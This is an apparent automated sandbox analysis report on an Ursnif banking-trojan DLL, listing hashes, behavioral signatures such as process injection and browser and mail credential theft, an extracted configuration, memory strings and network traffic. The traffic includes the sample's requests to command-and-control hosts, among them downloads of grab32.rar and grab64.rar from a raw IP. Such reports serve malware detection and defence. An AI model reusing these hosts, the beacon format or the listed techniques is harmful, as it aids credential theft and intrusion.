Analysis Report vnaSKDMnLG

Overview

General Information

Sample Name: vnaSKDMnLG (renamed file extension from none to dll)
Analysis ID: 322748
MD5: c9d954b3f1c512e6804fd8f5637b58b6
SHA1: b452040d8072117ddbe1adf9e1eab5e4bdb150bd
SHA256: d7fafabbb381c34185ad30f0d5337ec8072d0705e0e9fb1d91e7358ed934fff3
Tags: dllgozitr01ursnif

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: vnaSKDMnLG.dll Avira: detected
Found malware configuration
Source: regsvr32.exe.4360.1.memstr Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@536720hh", "dns": "536720", "version": "250166", "uptime": "167", "crc": "2", "id": "3050", "user": "0291816208f8d2d8cdc8873ad856765a", "soft": "3"}
Multi AV Scanner detection for submitted file
Source: vnaSKDMnLG.dll Virustotal: Detection: 11% Perma Link
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A842B4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_04A842B4

Networking:

barindex
Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler Jump to behavior
Found Tor onion address
Source: powershell.exe, 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 87.248.118.23 87.248.118.23
Source: Joe Sandbox View IP Address: 151.101.1.44 151.101.1.44
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View JA3 fingerprint: 7dd50e112cd23734a310b90f6f44a7cd
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.47.200
Source: global traffic HTTP traffic detected: GET /images/_2B9CjQr1xAViB33KLEZFl/2znYpePgiBaym/Zcv7ASeM/RH1S7KGYN6l8JiGWg4e9nXb/NQZq1SSxJi/mc5yp3cGYcmh41_2B/sgGwdOmEGgkx/5KQWfRKKgWK/Xt2u1awqIScbRf/sgOFy4dR5ErSJgERDDH7r/_2FEWj4i_2BFzqwq/_2BgPzFAK8qrY4B/dRdOEARjck/1iLUKWQnn/K.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: groovcerl.xyzConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: groovcerl.xyzConnection: Keep-AliveCookie: PHPSESSID=d50vmo31p61r9jkm7vp6r303t1; lang=en
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: groovcerl.xyzConnection: Keep-AliveCookie: PHPSESSID=d50vmo31p61r9jkm7vp6r303t1; lang=en
Source: global traffic HTTP traffic detected: GET /images/GHw2NFoi/uGw7IwXJCQkcQl1KQVbo_2B/820znWDaSW/Ov_2B4z8yJqAozhde/qBE2ImkkKvCH/VXQwRoWXG5R/k9cBAONcCOy6zC/schMO1Bz6Hv1XAWY_2Bj1/Epe_2FrlHpFxpDqb/wkcRD0A5Nn7ZtOM/LcznbG_2FsTdDMEgaN/jIHJPS5D0/Fp7e0qKKctEIDJT6MGkX/RCGhIjX0.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: groovcerl.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=d50vmo31p61r9jkm7vp6r303t1
Source: global traffic HTTP traffic detected: GET /images/_2B5hZPBBeMEkvAROXtH1/WZsdWhoR7wg_2Bd_/2BoOtRydsyDG3r9/w2GcVR9gar6CncemWY/lVp7AN_2F/YEmcQ_2BEaBJyDUMlsGk/jN8oDN7xGQMygxh4f9g/_2FyagJjAZDLRvoreYuui8/LRxePg_2BGB0U/MpT06eFx/VfNkohToJFJcoGZ4_2Bgo5f/Opt0pN_2FL/JG_2FCiZ4ufIuI3kc/AT1ZiYCskKpp/v3TP_2FuS2b/9i.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: groovcerl.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=d50vmo31p61r9jkm7vp6r303t1
Source: global traffic HTTP traffic detected: GET /grab32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 63.250.47.200Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /grab64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 63.250.47.200Connection: Keep-AliveCache-Control: no-cache
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.437340795.0000000008BDA000.00000004.00000001.sdmp String found in binary or memory: :2020112520201126: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
Source: explorer.exe, 0000001E.00000000.437340795.0000000008BDA000.00000004.00000001.sdmp String found in binary or memory: :2020112520201126: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365F equals www.hotmail.com (Hotmail)
Source: explorer.exe, 0000001E.00000000.437340795.0000000008BDA000.00000004.00000001.sdmp String found in binary or memory: :2020112520201126: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365\ equals www.hotmail.com (Hotmail)
Source: explorer.exe, 0000001E.00000000.437340795.0000000008BDA000.00000004.00000001.sdmp String found in binary or memory: :2020112520201126: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365}X equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: www.msn.com
Source: explorer.exe, 0000001E.00000000.439561975.000000000DC70000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.439561975.000000000DC70000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, control.exe, 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, control.exe, 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000016.00000003.417318840.0000020EA8B38000.00000004.00000001.sdmp String found in binary or memory: http://crl.osofts/Microt0
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: explorer.exe, 0000001E.00000002.512108234.0000000000EB8000.00000004.00000020.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001E.00000003.477391818.000000000E9DF000.00000004.00000040.sdmp String found in binary or memory: http://groovcerl.xyz/favicon.ico
Source: explorer.exe, 0000001E.00000000.440619372.000000000EE32000.00000004.00000001.sdmp String found in binary or memory: http://groovcerl.xyz/imaA
Source: explorer.exe, 0000001E.00000000.440619372.000000000EE32000.00000004.00000001.sdmp String found in binary or memory: http://groovcerl.xyz/images/GHw2NFoi/uGw#
Source: explorer.exe, 0000001E.00000000.437107057.0000000008A32000.00000004.00000001.sdmp String found in binary or memory: http://groovcerl.xyz/images/GHw2NFoi/uGw7IwXJCQkcQl1KQVbo_2B/820znWDaSW/Ov_2B4z8yJqAozhde/qBE2ImkkKv
Source: explorer.exe, 0000001E.00000000.420488752.0000000001400000.00000002.00000001.sdmp String found in binary or memory: http://groovcerl.xyz/images/_2B5hZPBBeMEkvAROXtH1/WZsdWhoR7wg_2Bd_/2BoOtRydsyDG3r9/w2GcVR9gar6C
Source: explorer.exe, 0000001E.00000000.437533934.0000000008C57000.00000004.00000001.sdmp String found in binary or memory: http://groovcerl.xyz/images/_2B5hZPBBeMEkvAROXtH1/WZsdWhoR7wg_2Bd_/2BoOtRydsyDG3r9/w2GcVR9gar6CncemW
Source: explorer.exe, 0000001E.00000000.437107057.0000000008A32000.00000004.00000001.sdmp String found in binary or memory: http://groovcerl.xyz/images/_2B9CjQr1xAViB33KLEZFl/2znYpePgiBaym/Zcv7ASeM/RH1S7KGYN6l8JiGWg4e9nXb/NQ
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: powershell.exe, 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, control.exe, 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
